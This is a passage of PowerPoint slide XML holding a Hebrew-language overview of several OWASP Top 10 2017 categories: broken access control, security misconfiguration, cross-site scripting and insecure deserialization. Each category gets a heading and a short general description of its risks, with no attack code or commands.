              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A5:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - בקרת גישה שבורה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="5054225"/>
            <a:ext cx="5218177" cy="682261"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ניהול תצורה לא מאובטח נחשב כבעיה הנפוצה ביותר. דבר זה לרוב תוצאה של הגדרות ברירת מחדל בלתי-מאובטחות, הגדרות חלקיות או נקודתיות, שירותי אחסון נגישים מבוססי ענן, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר הוגדרו בצורה בלתי מאובטחת, וכן הודעות שגיאה מפורטות המכילות מידע רגיש. לא מספיק שמערכות הפעלה, מסגרות עבודה, ספריות קוד ויישום ניתנים לאבטחה, אלא שנדרש לעדכן ולשדרג אותם מעת לעת.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="5031000"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="5877145"/>
            <a:ext cx="5218177" cy="661582"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>חולשות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> קורות בכל עת שיישום מכיל מידע בלתי מאומת בעמוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> חדש ללא בדיקה מספקת או ביצוע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, או עדכון עמוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> קיים עם מידע מהמשתמש באמצעות ממשק פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) מבוסס דפדפן אשר עשוי ליצור קוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מאפשר לתוקפים להריץ סקריפטים בדפדפן הקורבן, דבר אשר עשוי לאפשר גניבת מזהה המשתמש, השחתת אתרי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, או הפניית המשתמש לאתר זדוני.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319210" y="5833981"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A7:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="6731648"/>
            <a:ext cx="5218177" cy="512590"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>פתיחה לא מאובטחת של רצף סדרתי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>עשויה לעיתים להוביל להרצת קוד עוין מרוחק. אפילו אם חולשות אלו לא מסתיימות בהרצת קוד עוין מרוחק, הן עשויות לשמש לתקיפה, לרבות ביצוע מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>replay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, מתקפות הזרקת קוד, וכן מתקפות העלאת הרשאה.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="6636962"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A8:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - פתיחה לא מאובטחת של רצף </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>סדרתי (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="7495636"/>
            <a:ext cx="5218177" cy="611796"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
